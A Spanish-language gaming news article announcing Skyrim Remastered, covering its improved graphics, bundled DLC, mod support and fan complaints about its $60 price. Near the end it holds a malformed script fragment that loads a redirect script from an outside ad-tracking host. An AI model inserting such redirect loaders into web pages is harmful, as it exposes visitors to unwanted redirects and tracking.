La aventura de The Elder Scrolls: Skyrim continúa en HD para todos los fans.

Una aventura épica remasterizada.

 

La aventura de Skyrim que ha obtenido millones de fans alrededor del mundo será lanzada a finales de este año con mejores gráficos para las nuevas consolas y tendrá todos los DLC.

Bethesda se ha colocado como una de las mejores desarrolladoras y distribuidoras de videojuegos alrededor del mundo, creando historias y juegos que han sido reconocidos por sus excelentes gráficos, gameplays e innovaciones, sin duda, uno de los mejores títulos ha sido su franquicia de The Elder Scrolls.

La quinta entrega de esta franquicia es Skyrim, que se ha convertido en uno de los mejores juegos de los últimos años, llevando  al usuario a un mundo lleno de aventuras, magia y monstruos que solo se han visto en películas de fantasía, obligando al jugador a crear su propio destino y personaje, conforme avance en el juego.

 

Skyrim Remastered será lanzado al mercado con mejores gráficas, incluyendo efectos remasterizados, mejor resolución y profundidad de campo. También contará con los tres DLC y será compatible con mods in-game, que son conocidos como algunas mejoras o características extras que se le pueden agregar al juego (en caso de que el usuario quiera), para volverlo más personalizado, estas mejoras son creadas por los jugadores alrededor del mundo.

El problema que ha surgido en las redes sociales y con la empresa de Bethesda, es que el precio del juego será de $60 dólares, causando molestias por algunos usuarios. Hay que tener en mente que las remasterizaciones de juegos siempre son más baratas que los títulos originales, debido a que el usuario que lo compra ya ha adquirido la primera entrega anteriormente y apoya también a la empresa adquiriendo la remasterización.

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

var d=document;var s=d.createElement(”);

Etiquetas:|
Comentarios